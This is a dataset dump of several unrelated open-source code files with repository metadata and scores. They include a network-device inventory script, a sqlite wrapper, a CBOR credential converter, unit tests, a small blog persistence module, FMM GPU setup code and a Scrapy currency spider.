max_stars_repo_path stringlengths 3 269 | max_stars_repo_name stringlengths 4 119 | max_stars_count int64 0 191k | id stringlengths 1 7 | content stringlengths 6 1.05M | score float64 0.23 5.13 | int_score int64 0 5 |
|---|---|---|---|---|---|---|
sa/profiles/Alcatel/AOS/get_inventory.py | prorevizor/noc | 84 | 16900 | <filename>sa/profiles/Alcatel/AOS/get_inventory.py
# ----------------------------------------------------------------------
# Alcatel.AOS.get_inventory
# ----------------------------------------------------------------------
# Copyright (C) 2007-2014 The NOC Project
# See LICENSE for details
# ----------------------------------------------------------------------
# Python modules
import re
# NOC modules
from noc.core.script.base import BaseScript
from noc.sa.interfaces.igetinventory import IGetInventory
class Script(BaseScript):
    """Collect inventory (chassis plus SFP/XFP transceivers) from Alcatel AOS.

    Chassis data comes from the get_version script; transceiver data is
    scraped from the ``show ni`` CLI output with the ``rx_ni`` regex.
    """

    name = "Alcatel.AOS.get_inventory"
    interface = IGetInventory

    # Matches one "GBIC <n>" section of "show ni" output.  The hardware
    # revision may be absent, hence the (|(?P<hw_rev>\S+)) alternative.
    rx_ni = re.compile(
        r"^\s+GBIC\s+(?P<int_number>\d+)\n"
        r"\s+Manufacturer Name:\s+(?P<vendor>\S+)(|\s+),\n"
        r"^\s+Part Number:\s+(?P<part_number>\S+)(|\s+),\n"
        r"^\s+Hardware Revision:\s+(|(?P<hw_rev>\S+))(|\s+),\n"
        r"^\s+Serial Number:\s+(?P<serial>\S+)(|\s+)(|\s+),\n",
        re.IGNORECASE | re.MULTILINE | re.DOTALL,
    )

    def execute(self):
        """Return a list of inventory dicts: one CHASSIS entry followed by
        one XCVR entry per transceiver found in ``show ni``."""
        objects = []
        # Chassis info
        p = self.scripts.get_version()
        objects += [
            {
                "type": "CHASSIS",
                "number": None,
                "vendor": "ALU",
                "serial": p["attributes"].get("Serial Number"),
                "description": "%s %s" % (p["vendor"], p["platform"]),
                "part_no": p["platform"],
                "revision": p["attributes"].get("HW version"),
                "builtin": False,
            }
        ]
        # Transiver Detected
        iface = self.cli("show ni")
        for match in self.rx_ni.finditer(iface):
            number = match.group("int_number")
            # type = match.group("int")
            # vendor = match.group("vendor")
            serial = match.group("serial")
            hw_rev = match.group("hw_rev")
            if not hw_rev:
                # Empty regex group is normalized to the literal string
                # "None" (kept as-is for downstream compatibility).
                hw_rev = "None"
            part_no = match.group("part_number")
            # Map the raw part number onto a NOC catalog part_no string.
            if "XFP-10G-LR" in part_no:
                part = "NoName | Transceiver | 10G | XFP LR"
            elif "SFP-LX" in part_no:
                part = "NoName | Transceiver | 1G | SFP LX"
            elif "SFP-LH" in part_no:
                part = "NoName | Transceiver | 1G | SFP LH"
            elif "GLC-BX" in part_no:
                part = "Cisco | Transceiver | 1G | GLC-BX-D"
            else:
                # Fallback for unrecognized part numbers.
                part = "NoName | Transceiver | 1G | SFP SX"
            objects += [
                {
                    "type": "XCVR",
                    "number": number,
                    "vendor": "NONAME",
                    "serial": serial,
                    "description": "SFP Transceiver " + part_no,
                    "part_no": [part],
                    "revision": hw_rev,
                    "builtin": False,
                }
            ]
        return objects
| 2.15625 | 2 |
db_conn.py | achhetr/Library-book-store-app | 0 | 16901 | import sqlite3
class Database:
    """Thin sqlite3 wrapper around a single ``book`` table.

    The table is created on first use.  All statements use parameterized
    queries, so values are never interpolated into SQL text.
    """

    def __init__(self, db):
        """Open (or create) the database *db* and ensure the table exists.

        Fix: the original reused the cursor returned by the CREATE
        statement; obtain a proper cursor explicitly instead.
        """
        self.conn = sqlite3.connect(db)
        self.cur = self.conn.cursor()
        self.cur.execute(
            "CREATE TABLE IF NOT EXISTS book (id INTEGER PRIMARY KEY, "
            "title TEXT, author TEXT, year INTEGER, isbn INTEGER)"
        )
        self.conn.commit()

    def insert(self, title, author, year, isbn):
        """Add a new book row; the id is assigned by sqlite."""
        self.cur.execute(
            "INSERT INTO book VALUES (NULL,?,?,?,?)", (title, author, year, isbn)
        )
        self.conn.commit()

    def view(self):
        """Return all rows as a list of (id, title, author, year, isbn)."""
        self.cur.execute("SELECT * FROM book")
        return self.cur.fetchall()

    def search(self, title="", author="", year="", isbn=""):
        """Return rows where any of the given fields matches exactly."""
        self.cur.execute(
            "SELECT * FROM book WHERE title=? OR author=? OR year=? OR isbn=?",
            (title, author, year, isbn),
        )
        return self.cur.fetchall()

    def delete(self, id):
        """Remove the row with the given id (no-op if it does not exist)."""
        self.cur.execute("DELETE FROM book WHERE id=?", (id,))
        self.conn.commit()

    def update(self, id, title, author, year, isbn):
        """Overwrite every field of the row with the given id."""
        self.cur.execute(
            "UPDATE book SET title=?, author=?, year=?, isbn=? WHERE id=?",
            (title, author, year, isbn, id),
        )
        self.conn.commit()

    def __del__(self):
        # Guard: __init__ may have raised before self.conn was assigned,
        # in which case the original __del__ itself raised AttributeError.
        if hasattr(self, "conn"):
            self.conn.close()
edge-tool/cbor_converter.py | hckim-kornic/mbed-edge-kornic | 0 | 16902 | #!/usr/bin/env python
# ----------------------------------------------------------------------------
# Copyright 2018 ARM Ltd.
#
# SPDX-License-Identifier: Apache-2.0
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ----------------------------------------------------------------------------
import os
import cbor2
import struct
from pyclibrary import CParser
from collections import namedtuple
# C symbol names whose values are DER certificates in the parsed sources.
CERTIFICATE_KEYS = ('MBED_CLOUD_DEV_BOOTSTRAP_DEVICE_CERTIFICATE',
                    'MBED_CLOUD_DEV_BOOTSTRAP_SERVER_ROOT_CA_CERTIFICATE',
                    'arm_uc_default_certificate')

# BUG FIX: this was written as ('...') which is a plain string, so
# "key in KEY_KEYS" performed a substring test instead of tuple
# membership.  The trailing comma makes it a one-element tuple.
KEY_KEYS = ('MBED_CLOUD_DEV_BOOTSTRAP_DEVICE_PRIVATE_KEY',)

# Symbols that belong to the firmware-update configuration.
UPDATE_KEYS = ('arm_uc_default_certificate',
               'arm_uc_class_id',
               'arm_uc_vendor_id')

# Maps C symbol names to the key names used inside the CBOR document.
KEY_MAP = {
    'MBED_CLOUD_DEV_BOOTSTRAP_DEVICE_CERTIFICATE': 'mbed.BootstrapDeviceCert',
    'MBED_CLOUD_DEV_BOOTSTRAP_SERVER_ROOT_CA_CERTIFICATE': 'mbed.BootstrapServerCACert',
    'MBED_CLOUD_DEV_BOOTSTRAP_DEVICE_PRIVATE_KEY': 'mbed.BootstrapDevicePrivateKey',
    'MBED_CLOUD_DEV_BOOTSTRAP_ENDPOINT_NAME': 'mbed.EndpointName',
    'MBED_CLOUD_DEV_BOOTSTRAP_SERVER_URI': 'mbed.BootstrapServerURI',
    'MBED_CLOUD_DEV_ACCOUNT_ID': 'mbed.AccountID',
    'MBED_CLOUD_DEV_MANUFACTURER': 'mbed.Manufacturer',
    'MBED_CLOUD_DEV_MODEL_NUMBER': 'mbed.ModelNumber',
    'MBED_CLOUD_DEV_SERIAL_NUMBER': 'mbed.SerialNumber',
    'MBED_CLOUD_DEV_DEVICE_TYPE': 'mbed.DeviceType',
    'MBED_CLOUD_DEV_HARDWARE_VERSION': 'mbed.HardwareVersion',
    'MBED_CLOUD_DEV_MEMORY_TOTAL_KB': 'mbed.MemoryTotalKB',
    'arm_uc_default_certificate': 'mbed.UpdateAuthCert',
    'arm_uc_class_id': 'mbed.ClassId',
    'arm_uc_vendor_id': 'mbed.VendorId'
}

# Record shapes serialized into the CBOR document.
ConfigParam = namedtuple('ConfigParam', ['Data', 'Name'])
Certificate = namedtuple('Certificate', ['Data', 'Format', 'Name'])
Key = namedtuple('Key', ['Data', 'Format', 'Name', 'Type'])
class CBORConverter():
    """Convert mbed developer-credential C files into a single CBOR blob."""

    def __init__(self, development_certificate, update_resource, cbor_file):
        self.development_certificate = development_certificate
        self.update_resource = update_resource
        self.cbor_file = cbor_file

    def __check_file_exists(self, path):
        """Return True if *path* is an existing regular file, else warn."""
        if not os.path.isfile(path):
            # BUG FIX: the original printed the literal "%s" because the
            # format argument was missing.
            print("File '%s' does not exist." % path)
            return False
        return True

    def parse_c_file(self):
        """Parse both C source files and return their constant values,
        or None when either input file is missing."""
        if not self.__check_file_exists(self.development_certificate) or \
           not self.__check_file_exists(self.update_resource):
            return None
        values = {}
        values.update(CParser([self.development_certificate]).defs.get('values'))
        values.update(CParser([self.update_resource],
                              macros={
                                  'MBED_CLOUD_DEV_UPDATE_ID': 1,
                                  'MBED_CLOUD_DEV_UPDATE_CERT': 1
                              }).defs.get('values'))
        return values

    def create_cbor_data(self, vars):
        """Build the CBOR document (certificates, keys, config params)
        from the parsed variable dict."""
        cbor_data = {'Certificates': [],
                     'Keys': [],
                     'ConfigParams': [],
                     'SchemeVersion': '0.0.1'}
        # Presence of the bootstrap URI selects bootstrap mode.
        use_bootstrap = 1 if 'MBED_CLOUD_DEV_BOOTSTRAP_SERVER_URI' in vars.keys() else 0
        cbor_data['ConfigParams'].append(
            ConfigParam(use_bootstrap, 'mbed.UseBootstrap')._asdict())
        for key in vars.keys():
            var = vars.get(key)
            cbor_var_key = KEY_MAP.get(key, None)
            if not cbor_var_key:
                print("Key %s not in KEY_MAP." % key)
                continue
            if key in CERTIFICATE_KEYS:
                # C byte arrays arrive as int sequences; pack to bytes.
                byte_data = struct.pack('%sB' % len(var), *var)
                certificate = Certificate(byte_data, 'der', cbor_var_key)._asdict()
                cbor_data['Certificates'].append(certificate)
            elif key in KEY_KEYS:
                byte_data = struct.pack('%sB' % len(var), *var)
                private_key = Key(byte_data, 'der', cbor_var_key, 'ECCPrivate')._asdict()
                cbor_data['Keys'].append(private_key)
            elif key in UPDATE_KEYS:
                byte_data = struct.pack('%sB' % len(var), *var)
                config_param = ConfigParam(byte_data, cbor_var_key)._asdict()
                cbor_data['ConfigParams'].append(config_param)
            else:
                config_param = ConfigParam(var, cbor_var_key)._asdict()
                cbor_data['ConfigParams'].append(config_param)
        return cbor_data

    def convert_to_cbor(self):
        """Parse the inputs and write the CBOR document to self.cbor_file."""
        vars = self.parse_c_file()
        if not vars:
            print("No variables parsed.")
        else:
            cbor_data = self.create_cbor_data(vars)
            with open(self.cbor_file, 'wb') as out_file:
                cbor2.dump(cbor_data, out_file)
| 1.632813 | 2 |
turbinia/processors/archive_test.py | sa3eed3ed/turbinia | 559 | 16903 | <filename>turbinia/processors/archive_test.py
# -*- coding: utf-8 -*-
# Copyright 2019 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for the Archive processor to compress and decompress folders."""
from __future__ import unicode_literals
import os
import tarfile
import unittest
import tempfile
from random import randint
from shutil import rmtree
from turbinia.processors import archive
from turbinia import TurbiniaException
class ArchiveProcessorTest(unittest.TestCase):
    """Tests for Archive Processor."""

    def setUp(self):
        """Create a scratch directory of random text files and compress it
        once so each test starts from a known state."""
        self.test_files = []
        self.base_output_dir = tempfile.mkdtemp(prefix='turbinia-test-local')
        self.tmp_files_dir = os.path.join(self.base_output_dir, 'files')
        self.tmp_archive = os.path.join(self.base_output_dir, 'files.tar.gz')
        if not os.path.exists(self.tmp_files_dir):
            os.makedirs(self.tmp_files_dir)
        # Generate text files containing random numbers.  Fix: the original
        # opened/closed the handles manually inside a while-counter loop;
        # use a context manager so handles are released even on error.
        file_max = 10
        for counter in range(file_max + 1):
            file_name = 'file{0:s}.txt'.format(str(counter))
            file_path = os.path.join(self.tmp_files_dir, file_name)
            rand_nums = [randint(0, 1000) for _ in range(50)]
            with open(file_path, 'w+') as file_open:
                for num in rand_nums:
                    file_open.write('%s\n' % str(num))
            self.test_files.append(file_name)
        archive.CompressDirectory(self.tmp_files_dir)

    def tearDown(self):
        # Remove testing directory for this unit test.
        if os.path.exists(self.base_output_dir):
            rmtree(self.base_output_dir)

    def test_compressed_dir(self):
        """Tests the compression function"""
        # Check if compressed directory matches expected output path.
        self.assertEqual(
            archive.CompressDirectory(self.tmp_files_dir), self.tmp_archive)
        # Check to confirm that the archive is gzip format.
        self.assertEqual(tarfile.is_tarfile(self.tmp_archive), True)
        # Raise assertion if folder does not exist.
        with self.assertRaises(TurbiniaException):
            archive.CompressDirectory('blah')

    def test_validate_tarfile(self):
        """Tests the validate function used to decompress tar files"""
        # Raise exception for file that does not exist.
        with self.assertRaises(TurbiniaException):
            archive.ValidateTarFile('blah.no')
        # Raise exception for a file with unsupported extension.
        with self.assertRaises(TurbiniaException):
            archive.ValidateTarFile(self.tmp_files_dir)
if __name__ == '__main__':
unittest.main()
| 2.375 | 2 |
blog.py | BenTimor/SerializationConceptSystem | 1 | 16904 | <reponame>BenTimor/SerializationConceptSystem<gh_stars>1-10
from utils import database
class Config:
    """Application state persisted as one serialized object in the
    ``concept`` database (row id=1 of the ``config`` table).

    Holds the user list, the post list and a {post_id: [Comment, ...]}
    map.  ``Config.config`` always points at the live instance.
    """

    # Class-level handle to the current (singleton-style) instance.
    config = None

    def __init__(self, users, posts, comments):
        self.users = users
        self.posts = posts
        self.comments = comments
        # Constructing a Config makes it the active one.
        Config.config = self

    @staticmethod
    def update():
        # Persist the current config object back to row id=1.
        database["concept", True]["config", "WHERE id=1"] = Config.config

    @staticmethod
    def setup():
        """Load the stored config, or seed the database with defaults."""
        try:
            Config.config = database["concept", True]["config", "WHERE id=1"][0][0]
        except:
            # No stored config yet (or it is unreadable): create a default
            # admin user, a first post and one comment, then persist it.
            Config.config = Config([User("Admin", "admin123", True)], [Post("Admin", 0, "Hello World!", "Lorem Ipsum")], {0: [Comment("Admin", "Lorem Ipsum")]})
            database["concept", True]["config"] = Config.config
class User:
    """A blog user; ``is_admin`` grants administrative rights."""

    def __init__(self, name, password, is_admin=False):
        self.name = name
        self.is_admin = is_admin
        self.password = password

    @staticmethod
    def new_user(name, password, is_admin=False):
        """Create a user, register it and persist the configuration."""
        Config.config.users.append(User(name, password, is_admin))
        Config.update()

    @staticmethod
    def get_user(name):
        """Return the first registered user with this name, or None."""
        return next(
            (candidate for candidate in Config.config.users
             if candidate.name == name),
            None,
        )
class Post:
    """A blog post identified by a sequential integer id."""

    def __init__(self, user, id, title, content):
        self.user = user
        self.id = id
        self.title = title
        self.content = content

    @staticmethod
    def new_post(user, title, content):
        """Append a post whose id is the next free index, then persist."""
        existing = Config.config.posts
        existing.append(Post(user, len(existing), title, content))
        Config.update()
class Comment:
    """A comment attached to a post via Config.config.comments[post_id]."""

    def __init__(self, user, content):
        self.user = user
        self.content = content

    @staticmethod
    def new_comment(post, user, content):
        """Append a comment to *post*'s comment list, creating the list
        if needed, then persist the configuration.

        BUG FIX: the original evaluated ``Config.config.comments[post]``
        before checking existence, raising KeyError for any post that had
        never been commented on; use a membership test instead.
        """
        if post not in Config.config.comments:
            Config.config.comments[post] = []
        Config.config.comments[post].append(Comment(user, content))
        Config.update()
src/svr/tests/__init__.py | yottaawesome/fsnd-project-2 | 3 | 16905 | from .test_db import TestDal
| 1.023438 | 1 |
Owner/models.py | 2000090063/Vehicle_Rental_System-SDP-2- | 3 | 16906 | from django.db import models
# Create your models here.
class Owner(models.Model):
    """Django model holding a vehicle owner's profile and license image."""

    # NOTE(review): models.AutoField is assigned without parentheses, so
    # this is a class reference, not a field instance — Django will supply
    # its own implicit "id" primary key.  Confirm whether this was meant
    # to be models.AutoField(primary_key=True).
    Owner_id = models.AutoField
    Owner_firstname = models.CharField(max_length=60)
    Owner_lastname = models.CharField(max_length=60)
    Owner_address = models.CharField(max_length=600)
    Owner_email = models.CharField(max_length=100)
    # NOTE(review): stored as a plain CharField — hashing is presumably
    # handled in the views; verify no plaintext passwords reach the DB.
    Owner_password = models.CharField(max_length=32)
    Owner_dob = models.DateField()
    Owner_mobileno = models.CharField(max_length=10)
    Owner_gender = models.CharField(max_length=15)
    # Uploaded driver's-license image, stored under media img/Owner_License/.
    Owner_license = models.ImageField(upload_to='img/Owner_License/')
    Owner_agency = models.CharField(max_length=100)
    Owner_city = models.CharField(max_length=30)
    Owner_state = models.CharField(max_length=30)
    Owner_country = models.CharField(max_length=30)
    Owner_pincode = models.IntegerField()
    # Distinguishes owner accounts from other account types.
    isOwner = models.BooleanField(default=True)

    def __str__(self):
        # Human-readable: "<email>: <license image path>".
        return self.Owner_email + ": " + str(self.Owner_license)
tectosaur/fmm/builder.py | jlmaurer/tectosaur | 17 | 16907 | import numpy as np
import tectosaur.util.gpu as gpu
from tectosaur.fmm.c2e import build_c2e
import logging
logger = logging.getLogger(__name__)
def make_tree(m, cfg, max_pts_per_cell):
    """Build a spatial tree over triangle centroids.

    Each triangle of mesh m = (points, triangles) is represented by its
    centroid and a bounding radius (the maximum vertex distance from the
    centroid).  The tree implementation comes from cfg.traversal_module.
    """
    pts, tris = m
    corner_coords = pts[tris]
    centroids = corner_coords.mean(axis=1)
    offsets = corner_coords - centroids[:, np.newaxis, :]
    radii = np.linalg.norm(offsets, axis=2).max(axis=1)
    return cfg.traversal_module.Tree.build(centroids, radii, max_pts_per_cell)
class FMM:
    """Prepares all GPU-side data for a fast-multipole matrix-vector product.

    Construction eagerly builds the interaction lists, gathers the GPU
    kernels, computes output sizes and transfers trees, meshes and
    check-to-equivalent operators to the GPU (via tectosaur.util.gpu).
    """

    def __init__(self, obs_tree, obs_m, src_tree, src_m, cfg):
        self.cfg = cfg
        self.obs_tree = obs_tree
        self.obs_m = obs_m
        self.src_tree = src_tree
        self.src_m = src_m
        # Name -> GPU array mapping filled in by the *_to_gpu helpers.
        self.gpu_data = dict()

        self.setup_interactions()
        self.collect_gpu_ops()
        self.setup_output_sizes()
        self.params_to_gpu()
        self.tree_to_gpu(obs_m, src_m)
        self.interactions_to_gpu()
        self.d2e_u2e_ops_to_gpu()

    def setup_interactions(self):
        """Run the dual-tree traversal to build all FMM interaction lists."""
        self.interactions = self.cfg.traversal_module.fmmmm_interactions(
            self.obs_tree, self.src_tree, self.cfg.inner_r, self.cfg.outer_r,
            self.cfg.order, self.cfg.treecode
        )

    def collect_gpu_ops(self):
        """Look up the kernel functions (s2s/s2p/p2s/p2p and c2e) for the
        configured kernel name from the compiled GPU module."""
        self.gpu_ops = dict()
        for a in ['s', 'p']:
            for b in ['s', 'p']:
                name = a + '2' + b
                self.gpu_ops[name] = getattr(self.cfg.gpu_module, name + '_' + self.cfg.K.name)
        self.gpu_ops['c2e1'] = self.cfg.gpu_module.c2e_kernel1
        self.gpu_ops['c2e2'] = self.cfg.gpu_module.c2e_kernel2

    def setup_output_sizes(self):
        """Compute vector sizes; 9 = 3 vertices x 3 components per triangle."""
        self.n_surf_tris = self.cfg.surf[1].shape[0]
        self.n_surf_dofs = self.n_surf_tris * 9
        self.n_multipoles = self.n_surf_dofs * self.src_tree.n_nodes
        self.n_locals = self.n_surf_dofs * self.obs_tree.n_nodes
        self.n_input = self.src_m[1].shape[0] * 9
        self.n_output = self.obs_m[1].shape[0] * 9

    def float_gpu(self, arr):
        # Transfer using the configured float precision.
        return gpu.to_gpu(arr, self.cfg.float_type)

    def int_gpu(self, arr):
        # Transfer as 32-bit integers (index arrays).
        return gpu.to_gpu(arr, np.int32)

    def params_to_gpu(self):
        """Transfer kernel parameters (e.g. material constants)."""
        self.gpu_data['params'] = self.float_gpu(self.cfg.params)

    def tree_to_gpu(self, obs_m, src_m):
        """Transfer mesh geometry (points/tris reordered to tree order) and
        per-node centers, radii and point ranges for both trees."""
        gd = self.gpu_data
        gd['obs_pts'] = self.float_gpu(obs_m[0])
        gd['obs_tris'] = self.int_gpu(obs_m[1][self.obs_tree.orig_idxs])
        gd['src_pts'] = self.float_gpu(src_m[0])
        gd['src_tris'] = self.int_gpu(src_m[1][self.src_tree.orig_idxs])
        obs_tree_nodes = self.obs_tree.nodes
        src_tree_nodes = self.src_tree.nodes
        for name, tree in [('src', self.src_tree), ('obs', self.obs_tree)]:
            gd[name + '_n_C'] = self.float_gpu(tree.node_centers)
            gd[name + '_n_R'] = self.float_gpu(tree.node_Rs)
        for name, tree in [('src', src_tree_nodes), ('obs', obs_tree_nodes)]:
            gd[name + '_n_start'] = self.int_gpu(np.array([n.start for n in tree]))
            gd[name + '_n_end'] = self.int_gpu(np.array([n.end for n in tree]))

    def interactions_to_gpu(self):
        """Transfer every interaction list; per-level ops (lists) get a
        numeric suffix per level (e.g. 'm2m0', 'm2m1', ...)."""
        op_names = ['p2p', 'p2m', 'p2l', 'm2p', 'm2m', 'm2l', 'l2p', 'l2l']
        for name in op_names:
            op = getattr(self.interactions, name)
            if type(op) is list:
                for i, op_level in enumerate(op):
                    self.op_to_gpu(name + str(i), op_level)
            else:
                self.op_to_gpu(name, op)

    def op_to_gpu(self, name, op):
        """Transfer the three index arrays describing one interaction list."""
        for data_name in ['obs_n_idxs', 'obs_src_starts', 'src_n_idxs']:
            self.gpu_data[name + '_' + data_name] = self.int_gpu(
                np.array(getattr(op, data_name), copy = False)
            )

    def d2e_u2e_ops_to_gpu(self):
        """Build and transfer the up/down check-to-equivalent operators
        (stored as SVD factors UT, E, V) plus their per-level node lists."""
        gd = self.gpu_data
        gd['u2e_obs_n_idxs'] = [
            self.int_gpu(np.array(self.interactions.u2e[level].obs_n_idxs, copy = False))
            for level in range(len(self.interactions.m2m))
        ]
        gd['d2e_obs_n_idxs'] = [
            self.int_gpu(np.array(self.interactions.d2e[level].obs_n_idxs, copy = False))
            for level in range(len(self.interactions.l2l))
        ]
        u2e_UT, u2e_E, u2e_V = build_c2e(
            self.src_tree, self.cfg.outer_r, self.cfg.inner_r, self.cfg
        )
        gd['u2e_V'] = self.float_gpu(u2e_V)
        gd['u2e_E'] = self.float_gpu(u2e_E)
        gd['u2e_UT'] = self.float_gpu(u2e_UT)
        d2e_UT, d2e_E, d2e_V = build_c2e(
            self.obs_tree, self.cfg.inner_r, self.cfg.outer_r, self.cfg
        )
        gd['d2e_V'] = self.float_gpu(d2e_V)
        gd['d2e_E'] = self.float_gpu(d2e_E)
        gd['d2e_UT'] = self.float_gpu(d2e_UT)

    def to_tree(self, input_orig):
        """Permute an input vector from original mesh order to tree order."""
        orig_idxs = np.array(self.src_tree.orig_idxs)
        input_orig = input_orig.reshape((-1,9))
        return input_orig[orig_idxs,:].flatten()

    def to_orig(self, output_tree):
        """Permute an output vector from tree order back to mesh order."""
        orig_idxs = np.array(self.obs_tree.orig_idxs)
        output_tree = output_tree.reshape((-1, 9))
        output_orig = np.empty_like(output_tree)
        output_orig[orig_idxs,:] = output_tree
        return output_orig.flatten()
def report_interactions(fmm_obj):
    """Log per-operator interaction counts and the FMM compression factor
    relative to a dense (direct) matrix-vector product."""
    dim = fmm_obj.obs_m[1].shape[1]
    order = fmm_obj.cfg.surf[1].shape[0]

    def tally(op_name, op):
        # A side is "surface" (equivalent-surface quadrature) unless the
        # corresponding letter of the op name is 'p' (particle).
        uses_obs_surf = op_name[2] != 'p'
        uses_src_surf = op_name[0] != 'p'
        return fmm_obj.cfg.traversal_module.count_interactions(
            op, fmm_obj.obs_tree, fmm_obj.src_tree,
            uses_obs_surf, uses_src_surf, order
        )

    n_obs_tris = fmm_obj.obs_m[1].shape[0]
    n_src_tris = fmm_obj.src_m[1].shape[0]

    interactions = dict()
    # Single-list operators.
    for op_name in ['p2m', 'p2l', 'm2l', 'p2p', 'm2p', 'l2p']:
        interactions[op_name] = tally(op_name, getattr(fmm_obj.interactions, op_name))
    # Per-level operators: accumulate across levels (the key is only
    # created if at least one level exists, matching the original).
    for op_name in ['m2m', 'l2l']:
        for level_op in getattr(fmm_obj.interactions, op_name):
            interactions[op_name] = interactions.get(op_name, 0) + tally(op_name, level_op)

    direct_i = n_obs_tris * n_src_tris
    fmm_i = sum(interactions.values())

    logger.info('compression factor: ' + str(fmm_i / direct_i))
    logger.info('# obs tris: ' + str(n_obs_tris))
    logger.info('# src tris: ' + str(n_src_tris))
    logger.info('total tree interactions: %e' % fmm_i)
    for k, v in interactions.items():
        logger.info('total %s interactions: %e' % (k, v))
| 2.078125 | 2 |
fabio/test/codecs/test_mpaimage.py | picca/fabio | 0 | 16908 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Project: Fable Input Output
# https://github.com/silx-kit/fabio
#
# Copyright (C) European Synchrotron Radiation Facility, Grenoble, France
#
# Principal author: <NAME> (<EMAIL>)
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
"""Multiwire Unit tests"""
from __future__ import print_function, with_statement, division, absolute_import
import unittest
import logging
logger = logging.getLogger(__name__)
import fabio
from ..utilstest import UtilsTest
class TestMpa(unittest.TestCase):
    """
    Test class for multiwire (mpa) images
    """

    TESTIMAGES = [
        # filename dim1 dim2 min max mean stddev
        ("mpa_test.mpa", 1024, 1024, 0, 1295, 0.8590, 18.9393),
    ]

    def test_read(self):
        """
        Test the reading of multiwire images
        """
        for imageData in self.TESTIMAGES:
            name, dim1, dim2, mini, maxi, mean, stddev = imageData
            # fabio shape convention is (dim2, dim1) == (rows, cols).
            shape = dim2, dim1
            logger.debug("Processing: %s" % name)
            # Test images are fetched (and decompressed) on demand.
            path = UtilsTest.getimage(name + ".bz2")[:-4]
            obj = fabio.mpaimage.MpaImage()
            obj.read(path)
            # Statistics are compared to 2 decimal places against the
            # reference values recorded in TESTIMAGES.
            self.assertAlmostEqual(mini, obj.getmin(), 2, "getmin [%s,%s]" % (mini, obj.getmin()))
            self.assertAlmostEqual(maxi, obj.getmax(), 2, "getmax [%s,%s]" % (maxi, obj.getmax()))
            self.assertAlmostEqual(mean, obj.getmean(), 2, "getmean [%s,%s]" % (mean, obj.getmean()))
            self.assertAlmostEqual(stddev, obj.getstddev(), 2, "getstddev [%s,%s]" % (stddev, obj.getstddev()))
            self.assertEqual(shape, obj.shape)
def suite():
    """Assemble and return the test suite for this module."""
    testsuite = unittest.TestSuite()
    testsuite.addTest(
        unittest.defaultTestLoader.loadTestsFromTestCase(TestMpa))
    return testsuite
if __name__ == '__main__':
runner = unittest.TextTestRunner()
runner.run(suite())
| 2.3125 | 2 |
currencySpider.py | cloud322/helloScrap | 0 | 16909 | # -*- coding: utf-8 -*-
import scrapy
import codecs
import sys
#리눅스상에서 utf-8 로 파일에 내용을 기록하려면 시스템 기본 인코딩으 ㄹutf-8 로 설정해야함
reload(sys)
sys.setdefaultencoding('utf8')
# scrapy 에서 spider 는 crawling/scrapping을 담당하는 핵심부분
#crawling/scrapping 절차에 대한 정의를 하는 부분
class CurrSpider(scrapy.Spider):
    """Scrapes currency names and exchange values from Naver finance and
    writes them to curr.csv, one "name,value" row per currency."""

    name = 'currSpider'
    start_urls = ['http://finance.naver.com/marketindex/?tabSel=exchange#tab_section']

    def parse(self, response):
        """Extract the currency names/values and save them as CSV rows.

        BUG FIX: the original wrote the two full Python lists as a single
        "%s,%s" line (their list reprs), producing one malformed row; the
        commented-out per-row code shows the intent.  Write one cleaned
        row per (name, value) pair instead.  The redundant f.close()
        inside the with-block was also removed.
        """
        names = response.css('span.blind::text').extract()
        values = response.css('span.value::text').extract()
        with codecs.open('curr.csv', 'w', 'utf-8') as f:
            for currency, value in zip(names, values):
                f.write('%s,%s\n' % (currency.strip(), value.strip()))
tests/test_sanity_check/test_similar_columns.py | thibaultbl/feature_engine | 1 | 16910 | <reponame>thibaultbl/feature_engine<gh_stars>1-10
import numpy as np
import pandas as pd
from feature_engine.sanity_check import SimilarColumns
def test_similar_columns_when_more_columns_in_train_than_test(
    df_vartypes, df_na
):
    """Fitting on the wider frame must add the missing column (filled
    with NaN) to the narrower frame, in training column order."""
    wide_train = df_na.copy()
    narrow_test = df_vartypes.copy()

    transformer = SimilarColumns()
    transformer.fit(wide_train)
    result = transformer.transform(narrow_test)

    expected = pd.DataFrame(
        {
            "Name": ["tom", "nick", "krish", "jack"],
            "City": ["London", "Manchester", "Liverpool", "Bristol"],
            "Studies": [np.nan] * 4,
            "Age": [20, 21, 19, 18],
            "Marks": [0.9, 0.8, 0.7, 0.6],
            "dob": pd.date_range("2020-02-24", periods=4, freq="T"),
        }
    )
    pd.testing.assert_frame_equal(expected, result)
def test_similar_columns_when_more_columns_in_test_than_train(
    df_vartypes, df_na
):
    """Fitting on the narrower frame must drop the extra test column,
    keeping only the columns seen during fit."""
    narrow_train = df_vartypes
    wide_test = df_na

    transformer = SimilarColumns()
    transformer.fit(narrow_train)
    result = transformer.transform(wide_test)

    expected = pd.DataFrame(
        {
            "Name": ["tom", "nick", "krish", np.nan, "peter", np.nan, "fred", "sam"],
            "City": [
                "London",
                "Manchester",
                np.nan,
                np.nan,
                "London",
                "London",
                "Bristol",
                "Manchester",
            ],
            "Age": [20, 21, 19, np.nan, 23, 40, 41, 37],
            "Marks": [0.9, 0.8, 0.7, np.nan, 0.3, np.nan, 0.8, 0.6],
            "dob": pd.date_range("2020-02-24", periods=8, freq="T"),
        }
    )
    pd.testing.assert_frame_equal(expected, result)
| 2.828125 | 3 |
